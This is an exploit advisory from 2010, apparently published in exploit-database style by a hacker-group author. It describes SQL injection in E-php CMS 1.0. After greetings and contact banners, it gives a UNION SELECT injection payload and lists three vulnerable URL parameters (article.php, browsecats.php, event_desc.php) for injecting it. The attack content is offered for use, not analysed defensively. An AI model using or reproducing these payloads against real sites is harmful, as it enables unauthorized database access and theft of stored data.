1 # Exploit Title: E−php CMS SQL Injection Vulnerability
2 # Date: 22−03−2010
3 # Author: Th3 RDX
4 # Software Link:
5 # Version: 1.0
6 # Tested on: Demo Site
7 # category: webapp
8 # Code :
9 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=
10 Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ###
11 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=
12 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=
13 Sp3c1al Th4nkz to : R00T and R45C4L
14 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=
15
16 ##############################################################################
17 %//
18
19 −−−−− [ Founder ] −−−−−
20
21 Th3 RDX
22
23 −−−−− [ E − mail ] −−−−−
24
25 th3rdx@gmail.com
26
27
28 %\\
29 ##############################################################################
30
31 ##############################################################################
32 %//
33
34 −−−−− [Title] −−−−−
35
36 E−php CMS SQL Injection Vulnerability
37
38 −−−−− [ Vendor ] −−−−−
39
40 http://www.ephpscripts.com/content−management−system.php
41
42 %\\
43 ##############################################################################
44
45 ##############################################################################
46 %//
47
48 −−−−− [ Exploit (s) ] −−−−−
49
50 Put [CODE] = SQL Injection Code
51
52 {e.g = article.php?es_id=11+and+1=0+ Union Select 1 , UNHEX(HEX([visible]))
Page 1/2
Ephp CMS SQL Injection Vulnerability
Th3 RDX
03/24/2010
53 ,3,4,5,6,7,8,9,10,11,12 (tables & column) }
54
55 [SQLi] http://server/e−php/article.php?es_id=11[CODE]
56
57 [SQLi] http://server/e−php/browsecats.php?cid=6[CODE]
58
59 [SQLi] http://server/e−php/event_desc.php?es_id=4[CODE]
60
61
62 %\\
63 ##############################################################################
64
65
66
67 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=
68 Thanks To All: I.C.W + W.O.I + H.M.G + C.I.A + AH Me